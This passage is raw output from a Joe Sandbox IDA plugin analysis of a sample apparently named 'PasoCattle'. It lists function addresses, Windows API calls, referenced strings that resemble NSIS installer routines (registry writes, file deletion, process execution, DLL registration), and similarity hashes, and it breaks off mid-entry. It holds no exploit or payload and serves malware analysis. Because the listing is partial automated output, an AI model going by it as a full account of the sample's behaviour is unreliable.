                                                                                                                                                                        • Instruction Fuzzy Hash: 5D71B5F1A00209BFDB109F65DD45EAA7B78FB44305F00853AFA05B62E1C778AD91CB99
                                                                                                                                                                        APIs
                                                                                                                                                                        • lstrcpyW.KERNEL32(00465E20,NUL,?,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA,?,00000000,000000F1,?), ref: 00406AD5
                                                                                                                                                                        • CloseHandle.KERNEL32(00000000,000000F1,00000000,00000001,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA,?,00000000,000000F1,?), ref: 00406AF4
                                                                                                                                                                        • GetShortPathNameW.KERNEL32(000000F1,00465E20,00000400), ref: 00406AFD
                                                                                                                                                                          • Part of subcall function 00405DE2: lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BFF,00000000,[Rename]), ref: 00405DF2
                                                                                                                                                                          • Part of subcall function 00405DE2: lstrlenA.KERNEL32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E24
                                                                                                                                                                        • GetShortPathNameW.KERNEL32(000000F1,0046B478,00000400), ref: 00406B1E
                                                                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00465E20,000000FF,00466620,00000400,00000000,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA), ref: 00406B47
                                                                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,0046B478,000000FF,00466C70,00000400,00000000,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA), ref: 00406B5F
                                                                                                                                                                        • wsprintfA.USER32 ref: 00406B79
                                                                                                                                                                        • GetFileSize.KERNEL32(00000000,00000000,0046B478,C0000000,00000004,0046B478,?,?,00000000,000000F1,?), ref: 00406BB1
                                                                                                                                                                        • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00406BC0
                                                                                                                                                                        • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00406BDC
                                                                                                                                                                        • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename]), ref: 00406C0C
                                                                                                                                                                        • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,00467070,00000000,-0000000A,0040A87C,00000000,[Rename]), ref: 00406C63
                                                                                                                                                                          • Part of subcall function 00405E7C: GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
                                                                                                                                                                          • Part of subcall function 00405E7C: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2
                                                                                                                                                                        • WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 00406C77
                                                                                                                                                                        • GlobalFree.KERNEL32(00000000), ref: 00406C7E
                                                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 00406C88
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000001.00000002.1719603114.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000001.00000002.1719589308.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719617822.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719752525.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_PasoCattle.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: File$ByteCharCloseGlobalHandleMultiNamePathShortWidelstrcpylstrlen$AllocAttributesCreateFreePointerReadSizeWritewsprintf
                                                                                                                                                                        • String ID: ^F$%s=%s$NUL$[Rename]$plF
                                                                                                                                                                        • API String ID: 565278875-3368763019
                                                                                                                                                                        • Opcode ID: 8d6a48264c4b44e6e847a38bbc5540ed6369e357cae48dbe616f47649f698452
                                                                                                                                                                        • Instruction ID: 187392fb1a539ff374a899d42f74550c270b9899c721d3c7d9f4fe98b52eb23c
                                                                                                                                                                        • Opcode Fuzzy Hash: 8d6a48264c4b44e6e847a38bbc5540ed6369e357cae48dbe616f47649f698452
                                                                                                                                                                        • Instruction Fuzzy Hash: F2414B322082197FE7206B61DD4CE6F3E6CDF4A758B12013AF586F21D1D6399C10867E
                                                                                                                                                                        APIs
                                                                                                                                                                        • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                                                                                        • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                                                                                        • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                                                                                        • CreateBrushIndirect.GDI32(00000000), ref: 004010D8
                                                                                                                                                                        • FillRect.USER32(00000000,?,00000000), ref: 004010ED
                                                                                                                                                                        • DeleteObject.GDI32(?), ref: 004010F6
                                                                                                                                                                        • CreateFontIndirectW.GDI32(?), ref: 0040110E
                                                                                                                                                                        • SetBkMode.GDI32(00000000,00000001), ref: 0040112F
                                                                                                                                                                        • SetTextColor.GDI32(00000000,000000FF), ref: 00401139
                                                                                                                                                                        • SelectObject.GDI32(00000000,?), ref: 00401149
                                                                                                                                                                        • DrawTextW.USER32(00000000,00476AA0,000000FF,00000010,00000820), ref: 0040115F
                                                                                                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 00401169
                                                                                                                                                                        • DeleteObject.GDI32(?), ref: 0040116E
                                                                                                                                                                        • EndPaint.USER32(?,?), ref: 00401177
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000001.00000002.1719603114.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000001.00000002.1719589308.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719617822.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719752525.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_PasoCattle.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                                                                                        • String ID: F
                                                                                                                                                                        • API String ID: 941294808-1304234792
                                                                                                                                                                        • Opcode ID: 2efc14ad74cb110e0ad817299842ebea0c3d587f520aff37d9c167bf14942bce
                                                                                                                                                                        • Instruction ID: 3a901b8e11bd10f40e8c3d59bf329074d7a31f92ad936af625f7db958ebfa50f
                                                                                                                                                                        • Opcode Fuzzy Hash: 2efc14ad74cb110e0ad817299842ebea0c3d587f520aff37d9c167bf14942bce
                                                                                                                                                                        • Instruction Fuzzy Hash: BF518772800209AFCF05CF95DD459AFBBB9FF45315F00802AF952AA1A1C738EA50DFA4
                                                                                                                                                                        APIs
                                                                                                                                                                        • RegCreateKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004028DA
                                                                                                                                                                        • lstrlenW.KERNEL32(004140F8,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004028FD
                                                                                                                                                                        • RegSetValueExW.ADVAPI32(?,?,?,?,004140F8,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004029BC
                                                                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 004029E4
                                                                                                                                                                          • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                          • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                        Strings
                                                                                                                                                                        • WriteRegStr: "%s\%s" "%s"="%s", xrefs: 00402918
                                                                                                                                                                        • WriteRegBin: "%s\%s" "%s"="%s", xrefs: 004029A1
                                                                                                                                                                        • WriteRegExpandStr: "%s\%s" "%s"="%s", xrefs: 0040292A
                                                                                                                                                                        • WriteReg: error writing into "%s\%s" "%s", xrefs: 004029D4
                                                                                                                                                                        • WriteReg: error creating key "%s\%s", xrefs: 004029F5
                                                                                                                                                                        • WriteRegDWORD: "%s\%s" "%s"="0x%08x", xrefs: 00402959
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000001.00000002.1719603114.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000001.00000002.1719589308.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719617822.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719752525.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_PasoCattle.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: lstrlen$CloseCreateValuewvsprintf
                                                                                                                                                                        • String ID: WriteReg: error creating key "%s\%s"$WriteReg: error writing into "%s\%s" "%s"$WriteRegBin: "%s\%s" "%s"="%s"$WriteRegDWORD: "%s\%s" "%s"="0x%08x"$WriteRegExpandStr: "%s\%s" "%s"="%s"$WriteRegStr: "%s\%s" "%s"="%s"
                                                                                                                                                                        • API String ID: 1641139501-220328614
                                                                                                                                                                        • Opcode ID: 066b4e300930aa0920c328732a1d1fc015c018ed119ca6dd3c3d5e24db852520
                                                                                                                                                                        • Instruction ID: c6ff7831871a22410ebf281ca69ba80d881ba5d3dc99c3f31bea2db7712f227d
                                                                                                                                                                        • Opcode Fuzzy Hash: 066b4e300930aa0920c328732a1d1fc015c018ed119ca6dd3c3d5e24db852520
                                                                                                                                                                        • Instruction Fuzzy Hash: EE418BB2D00208BFCF11AF91CD46DEEBB7AEF44344F20807AF605761A2D3794A509B69
                                                                                                                                                                        APIs
                                                                                                                                                                        • CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,00406300,00000000), ref: 0040612A
                                                                                                                                                                        • GetFileAttributesW.KERNEL32(00476240,?,00000000,00000000,?,?,00406300,00000000), ref: 00406168
                                                                                                                                                                        • WriteFile.KERNEL32(00000000,000000FF,00000002,00000000,00000000,00476240,40000000,00000004), ref: 004061A1
                                                                                                                                                                        • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,00476240,40000000,00000004), ref: 004061AD
                                                                                                                                                                        • lstrcatW.KERNEL32(RMDir: RemoveDirectory invalid input(""),0040A678,?,00000000,00000000,?,?,00406300,00000000), ref: 004061C7
                                                                                                                                                                        • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),?,?,00406300,00000000), ref: 004061CE
                                                                                                                                                                        • WriteFile.KERNEL32(RMDir: RemoveDirectory invalid input(""),00000000,00406300,00000000,?,?,00406300,00000000), ref: 004061E3
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000001.00000002.1719603114.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000001.00000002.1719589308.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719617822.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719752525.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_PasoCattle.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: File$Write$AttributesCloseHandlePointerlstrcatlstrlen
                                                                                                                                                                        • String ID: @bG$RMDir: RemoveDirectory invalid input("")
                                                                                                                                                                        • API String ID: 3734993849-3206598305
                                                                                                                                                                        • Opcode ID: 48839086a200bf93aa32383a4ca0414da094928b154be734d4a38c22442d7c90
                                                                                                                                                                        • Instruction ID: 195d9f7db6fc7c0c2d4377fc833027156c916e626c5a885f84869a8699de3d55
                                                                                                                                                                        • Opcode Fuzzy Hash: 48839086a200bf93aa32383a4ca0414da094928b154be734d4a38c22442d7c90
                                                                                                                                                                        • Instruction Fuzzy Hash: 0121C271500240EBD710ABA8DD88D9B3B6CEB06334B118336F52ABA1E1D7389D85C7AC
                                                                                                                                                                        APIs
                                                                                                                                                                        • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,000000F0), ref: 00402EA9
                                                                                                                                                                        • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,000000F0), ref: 00402EC5
                                                                                                                                                                        • GlobalFree.KERNEL32(FFFFFD66), ref: 00402EFE
                                                                                                                                                                        • WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,000000F0), ref: 00402F10
                                                                                                                                                                        • GlobalFree.KERNEL32(00000000), ref: 00402F17
                                                                                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,?,000000F0), ref: 00402F2F
                                                                                                                                                                        • DeleteFileW.KERNEL32(?), ref: 00402F56
                                                                                                                                                                        Strings
                                                                                                                                                                        • created uninstaller: %d, "%s", xrefs: 00402F3B
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000001.00000002.1719603114.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000001.00000002.1719589308.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719617822.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719752525.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_PasoCattle.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                                                                                                                                                        • String ID: created uninstaller: %d, "%s"
                                                                                                                                                                        • API String ID: 3294113728-3145124454
                                                                                                                                                                        • Opcode ID: 43406d439bebe3a41a7ad8946693a81c25abcec0bebba575c0e34f0bdeff8a90
                                                                                                                                                                        • Instruction ID: bd1c3f70b2adfd396ae192ad3b35d3c6df9fc0ba6a3ee2c413e2f7d1cf6bca0f
                                                                                                                                                                        • Opcode Fuzzy Hash: 43406d439bebe3a41a7ad8946693a81c25abcec0bebba575c0e34f0bdeff8a90
                                                                                                                                                                        • Instruction Fuzzy Hash: CF319E72800115ABDB11AFA9CD89DAF7FB9EF08364F10023AF515B61E1C7394E419B98
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetModuleHandleW.KERNEL32(00000000,00000001,000000F0), ref: 0040241C
                                                                                                                                                                          • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,0042A4AD,74DF23A0,00000000), ref: 00404FD6
                                                                                                                                                                          • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,0042A4AD,74DF23A0,00000000), ref: 00404FE6
                                                                                                                                                                          • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,0042A4AD,74DF23A0,00000000), ref: 00404FF9
                                                                                                                                                                          • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                                                                                          • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                                                                          • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                                                                          • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                                                                          • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                          • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                        • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 0040242D
                                                                                                                                                                        • FreeLibrary.KERNEL32(?,?), ref: 004024C3
                                                                                                                                                                        Strings
                                                                                                                                                                        • Error registering DLL: %s not found in %s, xrefs: 0040249A
                                                                                                                                                                        • Error registering DLL: Could not initialize OLE, xrefs: 004024F1
                                                                                                                                                                        • `G, xrefs: 0040246E
                                                                                                                                                                        • Error registering DLL: Could not load %s, xrefs: 004024DB
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000001.00000002.1719603114.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000001.00000002.1719589308.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719617822.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719752525.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_PasoCattle.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: MessageSendlstrlen$Library$FreeHandleLoadModuleTextWindowlstrcatwvsprintf
                                                                                                                                                                        • String ID: Error registering DLL: %s not found in %s$Error registering DLL: Could not initialize OLE$Error registering DLL: Could not load %s$`G
                                                                                                                                                                        • API String ID: 1033533793-4193110038
                                                                                                                                                                        • Opcode ID: dfa9fb55bab39987c49c05a208fb72d841c7d3de21fe9f712437cd20c315518e
                                                                                                                                                                        • Instruction ID: ac94b2829880799def153f2ab6d9fb01897d962df66ba524602deb4d09d833fb
                                                                                                                                                                        • Opcode Fuzzy Hash: dfa9fb55bab39987c49c05a208fb72d841c7d3de21fe9f712437cd20c315518e
                                                                                                                                                                        • Instruction Fuzzy Hash: AE21A635A00215FBDF20AFA1CE49A9D7E71AB44318F30817BF512761E1D6BD4A80DA5D
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetWindowLongW.USER32(?,000000EB), ref: 00403E10
                                                                                                                                                                        • GetSysColor.USER32(00000000), ref: 00403E2C
                                                                                                                                                                        • SetTextColor.GDI32(?,00000000), ref: 00403E38
                                                                                                                                                                        • SetBkMode.GDI32(?,?), ref: 00403E44
                                                                                                                                                                        • GetSysColor.USER32(?), ref: 00403E57
                                                                                                                                                                        • SetBkColor.GDI32(?,?), ref: 00403E67
                                                                                                                                                                        • DeleteObject.GDI32(?), ref: 00403E81
                                                                                                                                                                        • CreateBrushIndirect.GDI32(?), ref: 00403E8B
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000001.00000002.1719603114.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000001.00000002.1719589308.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719617822.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719752525.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_PasoCattle.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2320649405-0
                                                                                                                                                                        • Opcode ID: 2cd1843f4009558aed8999710a19f2fd839bd0fd7577925b5fb66d8747ca327a
                                                                                                                                                                        • Instruction ID: 46e75ec11a9703e62b9e59528547c83071966f0b6f932d53464b5ad1ffaeee7a
                                                                                                                                                                        • Opcode Fuzzy Hash: 2cd1843f4009558aed8999710a19f2fd839bd0fd7577925b5fb66d8747ca327a
                                                                                                                                                                        • Instruction Fuzzy Hash: CA116371500744ABCB219F78DD08B5BBFF8AF40715F048A2AE895E22A1D738DA44CB94
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                          • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                          • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,0042A4AD,74DF23A0,00000000), ref: 00404FD6
                                                                                                                                                                          • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,0042A4AD,74DF23A0,00000000), ref: 00404FE6
                                                                                                                                                                          • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,0042A4AD,74DF23A0,00000000), ref: 00404FF9
                                                                                                                                                                          • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                                                                                          • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                                                                          • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                                                                          • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                                                                          • Part of subcall function 00405C6B: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00461DD0,Error launching installer), ref: 00405C90
                                                                                                                                                                          • Part of subcall function 00405C6B: CloseHandle.KERNEL32(?), ref: 00405C9D
                                                                                                                                                                        • WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00402288
                                                                                                                                                                        • GetExitCodeProcess.KERNEL32(?,?), ref: 00402298
                                                                                                                                                                        • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00402AF2
                                                                                                                                                                        Strings
                                                                                                                                                                        • Exec: command="%s", xrefs: 00402241
                                                                                                                                                                        • Exec: failed createprocess ("%s"), xrefs: 004022C2
                                                                                                                                                                        • Exec: success ("%s"), xrefs: 00402263
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000001.00000002.1719603114.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000001.00000002.1719589308.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719617822.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719752525.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_PasoCattle.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: MessageSendlstrlen$CloseHandleProcess$CodeCreateExitObjectSingleTextWaitWindowlstrcatwvsprintf
                                                                                                                                                                        • String ID: Exec: command="%s"$Exec: failed createprocess ("%s")$Exec: success ("%s")
                                                                                                                                                                        • API String ID: 2014279497-3433828417
                                                                                                                                                                        • Opcode ID: 6019f50a09c3a98591d7ac19e214774b8a762e16cd0fcb62cdb4911ff5dda7cf
                                                                                                                                                                        • Instruction ID: 042007ee205ef60e30064d08c60082207347e2967af2fac5581f577c4c1081ae
                                                                                                                                                                        • Opcode Fuzzy Hash: 6019f50a09c3a98591d7ac19e214774b8a762e16cd0fcb62cdb4911ff5dda7cf
                                                                                                                                                                        • Instruction Fuzzy Hash: 4E11A332504115EBDB01BFE1DE49AAE3A62EF04324B24807FF502B51D2C7BD4D51DA9D
                                                                                                                                                                        APIs
                                                                                                                                                                        • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404895
                                                                                                                                                                        • GetMessagePos.USER32 ref: 0040489D
                                                                                                                                                                        • ScreenToClient.USER32(?,?), ref: 004048B5
                                                                                                                                                                        • SendMessageW.USER32(?,00001111,00000000,?), ref: 004048C7
                                                                                                                                                                        • SendMessageW.USER32(?,0000113E,00000000,?), ref: 004048ED
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000001.00000002.1719603114.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
